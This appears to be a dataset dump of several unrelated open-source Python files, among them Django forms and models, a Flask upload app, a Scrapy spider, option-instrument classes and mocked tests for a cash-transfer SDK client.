plan = self.cleaned_data["subscription"]
trial = check_trial_eligibility(plan, user)
if trial:
url = return_url(plan.pk, user, trial=True)
else:
url = subscription_url(plan, user)
send_mail(
spreedly_settings.SPREEDLY_CONFIRM_EMAIL_SUBJECT,
render_to_string(spreedly_settings.SPREEDLY_CONFIRM_EMAIL, {
'plan_name': plan.name,
'user': user,
'site': spreedly_settings.SPREEDLY_SITE_URL,
'spreedly_url': url
}),
settings.DEFAULT_FROM_EMAIL,
[user.email,]
)
return reverse('spreedly_email_sent', args=[user.id])
class GiftRegisterForm(forms.Form):
username = forms.CharField(
max_length=30,
required=True
)
email = forms.EmailField(
required=True
)
password1 = forms.CharField(
label="Password",
required=True,
widget=forms.PasswordInput(),
)
password2 = forms.CharField(
label="<PASSWORD>",
required=True,
widget=forms.PasswordInput(),
)
gift_key = forms.CharField(max_length=32, required=True, widget=forms.HiddenInput)
def clean(self):
username = self.cleaned_data.get("username")
email = self.cleaned_data.get("email")
pass1 = self.cleaned_data.get("password1")
pass2 = self.cleaned_data.get("<PASSWORD>")
gift_key = self.cleaned_data.get("gift_key")
if username:
try:
User.objects.get(username=self.cleaned_data['username'], is_active=True)
raise forms.ValidationError(_("Sorry, This username is already taken."))
except User.DoesNotExist:
pass
if username and email and pass1 and pass2:
if pass1 != pass2:
raise forms.ValidationError(_("You must type the same password each time."))
return self.cleaned_data
def save(self):
# remove any inactive users with this same username
try:
old_user = User.objects.get(username=self.cleaned_data['username'], is_active=False)
old_user.delete()
except User.DoesNotExist:
pass
gift = Gift.objects.get(uuid=self.cleaned_data["gift_key"])
user = gift.to_user
user.username = self.cleaned_data['username']
user.email = self.cleaned_data['email']
user.set_password(self.cleaned_data['<PASSWORD>'])
user.is_active=True
user.save()
#update spreedly info
client = Client(settings.SPREEDLY_AUTH_TOKEN, settings.SPREEDLY_SITE_NAME)
client.set_info(user.pk, email=user.email, screen_name=user.username)
gift.delete()
return user
class GiftForm(forms.Form):
subscription = forms.ModelChoiceField(queryset=Plan.objects.filter(plan_type='gift'), empty_label=None)
your_name = forms.CharField(
label="Your Name",
required=True
)
message = forms.CharField(
label="Message",
required=False,
widget=forms.Textarea(attrs={'rows':3, 'cols':55})
)
email = forms.EmailField(
label="Email",
required=True
)
email_again = forms.EmailField(
label="Email Again",
required=True
)
def clean(self):
email = self.cleaned_data.get("email")
email2 = self.cleaned_data.get("email_again")
if email and email2:
if email != email2:
raise forms.ValidationError(_("The two emails don't match. Please make sure both are correct."))
return self.cleaned_data
def save(self, request):
gift_id = str(uuid.uuid4().hex)[:29]
plan = self.cleaned_data["subscription"]
user = User.objects.create(
username=gift_id,
email=self.cleaned_data["email"],
is_active=False,
password='<PASSWORD>'
)
Gift.objects.create(
from_user=request.user,
to_user=user,
uuid = gift_id,
plan_name=plan.name,
message=self.cleaned_data["message"]
)
return (plan, user)
class PlanModelChoiceField(forms.ModelChoiceField):
def label_from_instance(self, obj):
if obj.enabled:
return unicode(obj)
else:
return '*%s' % (obj)
class AdminGiftForm(forms.Form):
plan_name = forms.CharField(
label="Plan Name",
required=True
)
feature_level = forms.ChoiceField(
label="Feature Level",
choices=[(x,x) for x in set(Plan.objects.values_list('feature_level', flat=True))]
)
time = forms.ChoiceField(
label="Time",
choices=[(i,i) for i in range(1,91)]
)
units = forms.ChoiceField(
label="Time Units",
choices=[
('days', 'Day(s)'),
('months', 'Month(s)')
]
)
your_name = forms.CharField(
label="Your Name",
required=True
)
message = forms.CharField(
label="Message",
required=False,
widget=forms.Textarea(attrs={'rows':3, 'cols':55})
)
email = forms.EmailField(
label="Email",
required=True
)
def save(self, request):
gift_id = str(uuid.uuid4().hex)[:29]
user = User.objects.create(
username=gift_id,
email=self.cleaned_data["email"],
is_active=False,
password='<PASSWORD>'
)
Gift.objects.create(
from_user=request.user,
to_user=user,
uuid = gift_id,
message=self.cleaned_data["message"],
plan_name=self.cleaned_data["plan_name"]
)
return user
| 2.265625
| 2
|
controllers/feed.py
|
Dans-labs/shebanq
| 24
|
12782915
|
<filename>controllers/feed.py<gh_stars>10-100
from textwrap import dedent
from markdown import markdown
from helpers import hEsc, sanitize, isodt
from urls import Urls
from queryrecent import QUERYRECENT
def atom():
"""Serves an RSS feed of recently saved shared queries.
See also [M:QUERYRECENT][queryrecent.QUERYRECENT].
"""
session.forget(response)
U = Urls()
QueryRecent = QUERYRECENT()
queries = QueryRecent.feed()
icon = URL("static", "images/shebanq_logo_xxsmall.png", host=True)
cover = URL("static", "images/shebanq_cover.png", host=True)
base = URL("xxx", "yyy", host=True, extension="")[0:-8]
feed = URL("feed", "atom", host=True, extension="")
xml = []
xml.append(
"""<?xml version="1.0" encoding="utf-8"?>
"""
)
xml.append(
dedent(
"""
<feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:webfeeds="http://webfeeds.org/rss/1.0"
>
"""
)
)
xml.append(
dedent(
f"""
<title>SHEBANQ</title>
<subtitle>Shared queries, recently executed</subtitle>
<link href="{hEsc(feed)}" rel="self"
title="SHEBANQ - Shared Queries" type="application/atom+xml"/>
<link href="{hEsc(base)}" rel="alternate" type="text/html"/>
<id>{hEsc(base + "/hebrew/queries")}</id>
<updated>{isodt()}</updated>
<category term="bible study"/>
<category term="biblical studies"/>
<category term="text"/>
<category term="linguistic"/>
<category term="hebrew"/>
<category term="bible"/>
<category term="query"/>
<category term="database"/>
<category term="research"/>
<category term="scholar"/>
<category term="annotation"/>
<category term="digital bible"/>
<category term="digital"/>
<category term="religion"/>
<category term="theology"/>
<icon>{hEsc(icon)}</icon>
<webfeeds:icon>{hEsc(icon)}</webfeeds:icon>
<logo>{hEsc(cover)}</logo>
<webfeeds:cover image="{hEsc(cover)}"/>
<webfeeds:accentColor>DDBB00</webfeeds:accentColor>
"""
)
)
for (
query_id,
first_name,
last_name,
query_name,
description,
qvid,
qexe,
qver,
) in queries:
descHtml = U.specialLinks(
sanitize(
markdown(
hEsc(description or "No description given"), output_format="xhtml5"
)
)
)
# we add a standard cover image if the description does not contain any image
standardImage = (
f"""<p><img src="{cover}"/></p>""" if "<img " not in descHtml else ""
)
href = hEsc(
URL(
"hebrew",
"query",
vars=dict(id=query_id, version=qver),
host=True,
extension="",
)
)
tag = f"tag:shebanq.ancient-data.org,2016-01-01:{query_id}/{qvid}/{qver}"
name = hEsc(f"{first_name} {last_name}")
xml.append(
dedent(
f"""
<entry>
<title>{hEsc(query_name)}</title>
<link href="{href}" rel="alternate" type="text/html"/>
<id>{tag}</id>
<updated>{isodt(qexe)}</updated>
<category term="query"/>
<content type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">
{standardImage}
{descHtml}
</div>
</content>
<author><name>{name}</name></author>
</entry>
"""
)
)
xml.append(
dedent(
"""
</feed>
"""
)
)
return dict(xml="".join(xml))
| 2.703125
| 3
|
tests/lupin/validators/test_in.py
|
Clustaar/lupin
| 22
|
12782916
|
import pytest
from lupin.errors import InvalidIn
from lupin.validators import In
@pytest.fixture
def validator():
return In({1, 2, 3})
class TestCall(object):
def test_raise_error_if_invalid_value(self, validator):
with pytest.raises(InvalidIn):
validator(4, [])
def test_does_nothing_if_valid_value(self, validator):
validator(1, [])
| 2.515625
| 3
|
rsvp_language/rsvp_language_protocol/langexpy_script/order.py
|
thomasbazeille/public_protocols
| 3
|
12782917
|
# -*- coding: utf-8 -*-
import os
import csv
import dirfiles
def trial_order(order_directory):
"""
Reads a specific trial order for n blocks from n csv files and
returns n lists to be used by the object block_list.order_trials()
of Expyriment library
"""
# Define the pathway of the inputs directory
order_path = os.path.abspath(order_directory)
# List csv files with sequence order of the inputs
order_filenames = dirfiles.listdir_csvnohidden(order_path)
order_filenames.sort()
# Read csv files
order_list = [[i for i in csv.reader(open(order_filename))]
for order_filename in order_filenames]
# Remove headers of each block lists
for i in range(len(order_list)):
order_list[i].pop(0)
# Extract the sequence from the second column of the block lists
norder_list = [[order_list[i][j][1] for j in range(len(order_list[i]))]
for i in range(len(order_list))]
# Convert "string" into "int" elements
norder_list = [map(int, norder_list[k]) for k in range(len(norder_list))]
# Return final sequence of trials for every block
return norder_list
| 3.453125
| 3
|
examples/render_test.py
|
markreidvfx/pct_titles
| 0
|
12782918
|
import pct_titles
import os
import cythonmagick
from StringIO import StringIO
def escape(s):
s = s.replace("&", "\&")
s = s.replace("<", "\<")
s = s.replace(">", ">")
s = s.replace('"', """)
s = s.replace("'", ''')
return s
def convert_color(c, alpha):
a = 1.0 - (alpha / 100.0)
r = c[0] / 65535.0
g = c[1] / 65535.0
b = c[2] / 65535.0
c = '#%04X%04X%04X%04X' % ( int(r*65535.0), int(g*65535.0), int(b*65535.0),
int(a*65535.0))
return c
def render_item(pct, img, item ,out_dir):
bbox = item.bbox
img.fill_color = 'white'
img.stroke_color = 'white'
min_x = min(bbox[1], bbox[3])
min_y = min(bbox[0], bbox[2])
max_x = max(bbox[1], bbox[3])
max_y = max(bbox[0], bbox[2])
width = max_x - min_x
height = max_y - min_y
rad_x = width/2.0
rad_y = height/2.0
origin_x = min_x + rad_x
origin_y = min_y + rad_y
fill_color = convert_color(item.fill_color, item.fill_alpha)
stroke_color = convert_color(item.border_color, item.border_alpha)
shadow_color = convert_color(item.shadow_color, item.shadow_alpha)
img.fill_color = fill_color
img.stroke_width = item.border_width
img.stroke_color = stroke_color
if item.border_width:
img.stroke_color = stroke_color
else:
img.stroke_color = fill_color
if isinstance(item, pct_titles.TitleLine):
img.stroke_width = item.line_width
img.stroke_color = 'white'
line = cythonmagick.Line(bbox[1], bbox[0], bbox[3], bbox[2])
img.draw([line])
elif isinstance(item, pct_titles.TitleRectangle):
roundness = item.corner_roundness / 2.0
rect = cythonmagick.RoundRectangle(min_x, min_y, max_x, max_y, roundness,roundness)
img.draw([rect])
elif isinstance(item, pct_titles.TitleOval):
origin_x = min_x + rad_x
origin_y = min_y + rad_y
oval = cythonmagick.Ellipse(origin_x, origin_y, rad_x, rad_y, 0, 360)
img.draw([oval])
elif isinstance(item, pct_titles.TitleText):
font_size = item.text_formating[0].font_size
font_id = item.text_formating[0].font_id
font_style_id = item.text_formating[0].style
font = pct.title_page.fonts[font_id].replace(" ", '-')
style = 'normal'
if font_style_id in (0x0200, 0x0300):
style = 'italic'
caption_size = "%dx%d" % (width, 0) # zero for auto height
caption = cythonmagick.Image(size=caption_size)
caption.font = font
caption.density = "72x72"
caption.font_point_size = font_size
caption.background = 'none'
caption.fill_color = fill_color
caption.stroke_width = item.border_width
caption.stroke_color = stroke_color
caption.font_style = style
# bold
if font_style_id in (0x0100, 0x0300):
caption.font_weight = 1
else:
caption.font_weight = 0
text = item.text
caption.read("caption:{text}".format(text=text))
grow = 200
original_size = caption.size()
caption.extent("%dx%d!" % (width+grow, height+grow), 'center')
offset_x = min_x - (caption.size().width - original_size.width) / 2
offset_y = min_y - (caption.size().height - original_size.height) / 2
position = cythonmagick.Geometry(0, 0, offset_x, offset_y)
if item.shadow_depth or item.shadow_blur:
alpha = caption.channel("alpha")
alpha.negate()
# alpha.write(os.path.join(out_dir, "alpha.png"))
shadow = cythonmagick.Image(size=alpha.size(), color=shadow_color)
shadow.composite(alpha, compose = "copyopacity")
if item.shadow_blur:
shadow.blur(1, item.shadow_blur)
shadow_pos = cythonmagick.Geometry(0, 0, offset_x + item.shadow_dir[1], offset_y + item.shadow_dir[0])
shadow.artifacts["compose:args"] = "%d" % (100-item.shadow_alpha)
img.composite(shadow, "dissolve", shadow_pos)
img.composite(caption, "over", position,)
def render_pct(src, dst):
pct = pct_titles.PctFile()
pct.read(src)
size = "865x485" # this seems to be the base resolution
img = cythonmagick.Image(size=size, color="grey")
#convert -list font
for i, item in enumerate(pct.elements):
render_item(pct, img, item, os.path.dirname(dst))
img.resize("720x486!")
name, ext = os.path.splitext(dst)
if ext and ext.lower() in (".pict", '.pct',):
img.magick = 'pict'
data = StringIO(img.tostring())
f = open(dst, 'wb')
pct.embed(data, f)
else:
img.write(dst)
if __name__ == "__main__":
from optparse import OptionParser
parser = OptionParser()
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("not enough args")
render_pct(args[0], args[1])
| 2.34375
| 2
|
website/hello.py
|
simonra/Distributed_Raspberry-Pi_Computing
| 0
|
12782919
|
import os
from flask import Flask, request, redirect, url_for, render_template, send_from_directory
from werkzeug import secure_filename
UPLOAD_FOLDER = 'uploads/'
ALLOWED_EXTENSIONS = set(['m'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16*1024*1024
def allowed_file(filename):
return '.' in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET','POST'])
def upload_file():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return redirect(url_for('uploaded_file' , filename=filename))
return render_template('index.html')
@app.route('/uploads/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
if __name__ == '__main__':
app.run(debug=True)
| 2.53125
| 3
|
polybookexchange/models.py
|
maltherd/polybookexchange
| 0
|
12782920
|
from django.db import models
from django.db.models import Min
import requests
import isbnlib
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
from django.templatetags.static import static
from django.conf import settings
import datetime
from django.utils.timezone import now
class Book(models.Model):
isbn = models.DecimalField(primary_key=True, max_digits=13, decimal_places=0)
title = models.CharField(max_length=255)
original_title = models.CharField(max_length=255)
edition = models.PositiveSmallIntegerField()
year = models.PositiveIntegerField()
avg_price = models.FloatField(default=0, blank=True, null=True)
qty_in_stock = models.IntegerField(default=0)
qty_sold = models.IntegerField(default=0)
publisher = models.ForeignKey('Publisher')
author = models.ManyToManyField('Author')
cover = models.ImageField(upload_to='poylbookexchange/covers')
def sellable(self):
return self.exemplar_set.filter(buyer_id=None).order_by('pk').all()
def sold(self):
return self.exemplar_set.exclude(buyer_id=None).order_by('pk').all()
def used_in_sections(self):
return Section.objects.filter(usedby__book__pk=self.pk).distinct().order_by('pk').all()
def used_in_semesters(self):
return Semester.objects.filter(usedby__book__pk=self.pk).distinct().order_by('pk').all()
def update_metadata(self):
try:
data = isbnlib.meta(str(self.isbn), 'wcat')
self.title = data.get('Title')
self.year = data.get('Year') or 1900
self.publisher, _ = Publisher.objects.get_or_create(name=data.get('Publisher', 'Unknow'))
self.author.clear()
for author in data.get('Authors', []):
for splited_author in author.split(', '):
author_object, _ = Author.objects.get_or_create(name=splited_author)
self.author.add(author_object)
except:
self.title = self.title or '?'
self.year = self.year or 1900
try:
truc = self.publisher
except:
self.publisher, _ = Publisher.objects.get_or_create(name='Unknow')
self.save()
def update_cover(self):
image = requests.get('http://images.amazon.com/images/P/%s.01._SS500_SCLZZZZZZZ_.jpg' % (isbnlib.to_isbn10(str(self.isbn)), ))
if image.status_code == 200 and len(image.content) > 50:
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
self.cover.save('%s.jpg' % (self.isbn,), File(img_temp))
else:
self.cover.delete()
def get_current_cover(self):
if self.cover:
return settings.MEDIA_URL + self.cover.name
return static('polybookexchange/default.png')
class Candidate(models.Model):
STATE_CHOICES = (
(u'neuf', u'neuf'),
(u'bon', u'bon'),
(u'acceptable', u'acceptable'),
(u'mauvais', u'mauvais'),
)
isbn = models.DecimalField(max_digits=13, decimal_places=0)
sciper = models.PositiveIntegerField()
annotated = models.BooleanField()
highlighted = models.BooleanField()
state = models.CharField(max_length=10, choices=STATE_CHOICES)
comments = models.TextField()
price = models.FloatField()
creation_date = models.DateTimeField(auto_now_add=True)
def days_left(self):
diff = (self.creation_date + datetime.timedelta(days=16) - now()).days
if diff < 0:
diff = 0
return diff
def days_left_percent(self):
return int(((15 - self.days_left()) * 100.0) / 15.0)
def days_left_color(self):
if self.days_left() < 1:
return 'danger'
if self.days_left() < 5:
return 'warning'
return 'success'
class CandidateUsage(models.Model):
candidate = models.ForeignKey('Candidate')
section = models.ForeignKey('Section')
semester = models.ForeignKey('Semester')
class Exemplar(models.Model):
STATE_CHOICES = (
(u'neuf', u'neuf'),
(u'bon', u'bon'),
(u'acceptable', u'acceptable'),
(u'mauvais', u'mauvais'),
)
book = models.ForeignKey('Book')
price = models.FloatField()
seller_id = models.PositiveIntegerField()
buyer_id = models.PositiveIntegerField(null=True, blank=True)
posted_date = models.DateTimeField(auto_now_add=True)
sold_date = models.DateTimeField(null=True, blank=True)
annotated = models.BooleanField(default=False)
highlighted = models.BooleanField(default=False)
state = models.CharField(max_length=10, choices=STATE_CHOICES)
comments = models.TextField(blank=True, null=True)
def min_price(self):
return Exemplar.objects.filter(book=self.book).exclude(sold_date=None).aggregate(Min('price'))['price__min']
def state_color(self):
mapping = {
'neuf': 'success',
'bon': 'info',
'acceptable': 'warning',
'mauvais': 'danger'
}
return mapping.get(self.state, 'primary')
class Publisher(models.Model):
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Author(models.Model):
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Section(models.Model):
name = models.CharField(max_length=255)
acronym = models.CharField(max_length=10)
class Semester(models.Model):
name = models.CharField(max_length=255)
acronym = models.CharField(max_length=10)
class UsedBy(models.Model):
book = models.ForeignKey('Book')
section = models.ForeignKey('Section')
semester = models.ForeignKey('Semester')
| 2.15625
| 2
|
portfolio/Python/scrapy/kalahari/takealot.py
|
0--key/lib
| 0
|
12782921
|
import re
import os
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, HtmlResponse
from scrapy.utils.response import get_base_url
from scrapy.utils.url import urljoin_rfc
from urllib import urlencode
import csv
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class TakeALotSpider(BaseSpider):
name = 'takealot.com'
allowed_domains = ['takealot.com']
def start_requests(self):
with open(os.path.join(HERE, 'products.csv')) as f:
reader = csv.DictReader(f)
for row in reader:
sku = row['ProdCode']
url = 'http://www.takealot.com/all/?qsearch=%s&order=price&direction=asc'
yield Request(url % sku, meta={'sku': sku})
def parse(self, response):
hxs = HtmlXPathSelector(response)
product = hxs.select('//li[@class="result-item hproduct"]')
if not product:
return
product = product[0]
loader = ProductLoader(item=Product(), selector=product)
loader.add_xpath('name', './/p[@class="p-title fn"]/a/text()')
url = hxs.select('.//p[@class="p-title fn"]/a/@href').extract()[0]
loader.add_value('url', urljoin_rfc(get_base_url(response), url))
loader.add_xpath('price', './/span[@class="amount"]/text()')
loader.add_value('sku', response.meta['sku'])
yield loader.load_item()
| 2.703125
| 3
|
common/instruments/instrument.py
|
codestetic/optionworkshop
| 0
|
12782922
|
<gh_stars>0
# -*- coding: utf-8 -*-
from datetime import datetime
import numpy as np
from common.instruments.option_type import *
month_codes = {
1: "F",
2: "G",
3: "H",
4: "J",
5: "K",
6: "M",
7: "N",
8: "Q",
9: "U",
10: "V",
11: "X",
12: "Z"
}
class Instrument:
def __init__(self, code: str, expiration: datetime = None, parent=None):
self.code = code
self.parent = parent
self.expiration = expiration
def tte(self):
if self.expiration is None:
return None
return (self.expiration - datetime.now()).total_seconds() / 365 / 24 / 3600
def __hash__(self):
return hash(self.code)
def __eq__(self, other):
return self.code == other.code
def __ne__(self, other):
return not (self == other)
class Underlying(Instrument):
def __init__(self, code: str, expiration: datetime = None) -> None:
Instrument.__init__(self, code, expiration)
class Equity(Underlying):
def __init__(self, code: str):
Underlying.__init__(self, code)
class Futures(Underlying):
def __init__(self, underlying: Underlying, expiration: datetime):
__code_format__ = "{0}{1}{2}"
self.expiration = expiration
Underlying.__init__(self, __code_format__.format(underlying.code,
month_codes[expiration.month],
expiration.strftime('%y')), expiration)
def __str__(self):
return self.code
class OptionSeries:
def __init__(self, underlying: Underlying, strikes: np.array, expiration: datetime) -> None:
code_format_string = '{0}-{1:%Y%m%d}'
self.strikes = strikes
self.expiration = expiration
self.underlying = underlying
self.code = code_format_string.format(underlying.code, expiration)
self.calls = {}
self.puts = {}
for strike in strikes:
call = Call(self, strike)
put = Put(self, strike)
self.calls[strike] = call
self.puts[strike] = put
def gns(self, underlying_price: float, shift: int = 0):
"""
Get Nearest Strike
Returns strike closest to specified underlying_price. If shift provided,
returns strike with corresponding index shift
:param underlying_price:
"""
closest_index = None
closest_value = None
closest_distance = None
i = 0
for strike in self.strikes:
if closest_index is None:
closest_distance = abs(underlying_price - strike)
closest_index = i
closest_value = strike
elif abs(underlying_price - strike) < closest_distance:
closest_distance = abs(underlying_price - strike)
closest_index = i
closest_value = strike
i = i + 1
return self.strikes[closest_index + shift]
def __str__(self):
return self.code
class Option(Instrument):
code_format_string = '{0}-{3:%Y%m%d}-{1}-{2}'
def __init__(self, series: OptionSeries, strike: float, code: str):
Instrument.__init__(self, code, series.expiration)
self.strike = strike
self.series = series
self.type = None
def __str__(self):
return self.code
class Call(Option):
def __init__(self, series: OptionSeries, strike: float):
Option.__init__(self, series, strike,
Option.code_format_string.format(series.underlying.code, 'C', strike, series.expiration))
self.type = OptionType.CALL
class Put(Option):
def __init__(self, series: OptionSeries, strike: float):
Option.__init__(self, series, strike,
Option.code_format_string.format(series.underlying.code, 'P', strike, series.expiration))
self.type = OptionType.PUT
| 2.359375
| 2
|
main/migrations/0001_initial.py
|
xn1990/B10
| 0
|
12782923
|
<reponame>xn1990/B10
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-29 11:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50, verbose_name='\u5e10\u53f7')),
('password', models.CharField(max_length=200, verbose_name='\<PASSWORD>')),
('Full_name', models.CharField(max_length=40, null=True, verbose_name='\u59d3\u540d')),
('gender', models.CharField(choices=[('\u7537', '\u7537'), ('\u5973', '\u5973')], max_length=2, null=True, verbose_name='\u6027\u522b')),
('living_address', models.CharField(default=b'\xe5\xb9\xbf\xe4\xb8\x9c\xe6\xb7\xb1\xe5\x9c\xb3', max_length=200, verbose_name='\u4f4f\u5740')),
('email_address', models.EmailField(max_length=254, null=True, verbose_name='\u90ae\u7bb1')),
('identity', models.CharField(choices=[('\u7ba1\u7406\u5458', '\u7ba1\u7406\u5458'), ('\u5de5\u4f5c\u4eba\u5458', '\u5de5\u4f5c\u4eba\u5458'), ('\u5fd7\u613f\u8005', '\u5fd7\u613f\u8005'), ('\u4e50\u961f', '\u4e50\u961f'), ('\u6e38\u5ba2', '\u6e38\u5ba2')], default='\u6e38\u5ba2', max_length=5, verbose_name='\u8eab\u4efd')),
('headImg', models.FileField(default=b'static/upload/default.jpg', upload_to=b'static/upload/')),
('creat_date', models.DateTimeField(auto_now_add=True, verbose_name='\u521b\u5efa\u65f6\u95f4')),
('update_time', models.DateTimeField(auto_now=True, null=True, verbose_name='\u4fee\u6539\u65f6\u95f4')),
],
),
]
| 1.734375
| 2
|
discord/ext/voice_recv/common/__init__.py
|
schlopp/Novus
| 61
|
12782924
|
<reponame>schlopp/Novus
# -*- coding: utf-8 -*-
from .rtp import *
| 1.09375
| 1
|
webapp/ansible/roles/webapp/files/webapp/app/form.py
|
iganari/hisucon2018
| 4
|
12782925
|
<filename>webapp/ansible/roles/webapp/files/webapp/app/form.py
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import DataRequired
class LoginForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('パスワード保存')
submit = SubmitField('ログイン')
| 1.890625
| 2
|
All_Source_Code/GatherData/GatherData_10.py
|
APMonitor/pds
| 11
|
12782926
|
<filename>All_Source_Code/GatherData/GatherData_10.py<gh_stars>10-100
f = open('dx.csv', 'r')
print(f.readline())
print(f.readline())
print(f.readline())
f.close()
| 1.875
| 2
|
tests/cash_service_test_case.py
|
odeoteknologi/odeo-python-sdk
| 0
|
12782927
|
import json
import unittest
import odeo.client
from odeo.exceptions import GeneralError, InputValidationError
from odeo.models.cash import *
from tests.service_test_case import ServiceTestCase
class CashServiceTestCase(ServiceTestCase):
def test_create_bulk_transfers(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/bulk-transfer',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'TPGgchibPJopgD2RSgD7H69kT6RimGUZqVhHwgovTrI='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'note': 'Example description',
'created_at': '1612137600'
}],
})
)
self.assertEqual(
[Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
note='Example description',
created_at=datetime(2021, 2, 1)
)],
self.client.cash.create_bulk_transfers([
Request(
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
note='Example description'
)
])
)
def test_create_bulk_transfers_with_default_params(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/bulk-transfer',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'Oncl5GPNiNlQHi/SKtuWa/HGjyGY7rkQ9jBA+j9aey4='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'created_at': '1612137600'
}],
})
)
self.assertEqual(
[Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
created_at=datetime(2021, 2, 1)
)],
self.client.cash.create_bulk_transfers([
Request(
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001'
)
])
)
def test_create_bulk_transfers_failed_amount_out_of_range(self):
self._create_failed_bulk_transfers_test(
InputValidationError,
10001,
'The requests.0.amount must be between 1000 and 1000000'
)
def test_create_bulk_transfers_failed_reference_id_already_used(self):
self._create_failed_bulk_transfers_test(
GeneralError, 10000, 'EXAMPLE-REF-ID-001 reference id exists'
)
def _create_failed_bulk_transfers_test(self, error, error_code, message):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/bulk-transfer',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'Oncl5GPNiNlQHi/SKtuWa/HGjyGY7rkQ9jBA+j9aey4='
},
status_code=400,
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': error_code
})
)
with self.assertRaises(error) as ctx:
self.client.cash.create_bulk_transfers([
Request(
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001'
)
])
self.assertEqual(str(ctx.exception), message)
def test_list_transfers(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transfers',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'YRHRKTH0L7nFSVGTO3Ng07KKBIys7olErXdtQFLVTio='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'created_at': '1612137600'
}]
})
)
self.assertEqual(
TransfersList(
transfers=[
Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
created_at=datetime(2021, 2, 1)
)
],
),
self.client.cash.list_transfers()
)
def test_list_transfers_with_next_page_token(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transfers',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'YRHRKTH0L7nFSVGTO3Ng07KKBIys7olErXdtQFLVTio='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'created_at': '1612137600'
}],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransfersList(
transfers=[
Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='abcdef'
),
self.client.cash.list_transfers()
)
def test_list_transfers_with_parameters(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transfers',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '9OFvffcuY/Jxg8wAFhvyidu8dLU9Ga/u5XbQas6e9hA='
},
text=json.dumps({
'transfers': [
{
'transfer_id': '11',
'sender_user_id': '22',
'receiver_user_id': '33',
'amount': 1000000,
'reference_id': 'REF-ID-111',
'created_at': '1612137600'
},
{
'transfer_id': '44',
'sender_user_id': '55',
'receiver_user_id': '66',
'amount': 2000000,
'reference_id': 'REF-ID-222',
'created_at': '1612137600'
}
],
'next_page_token': '<PASSWORD>'
})
)
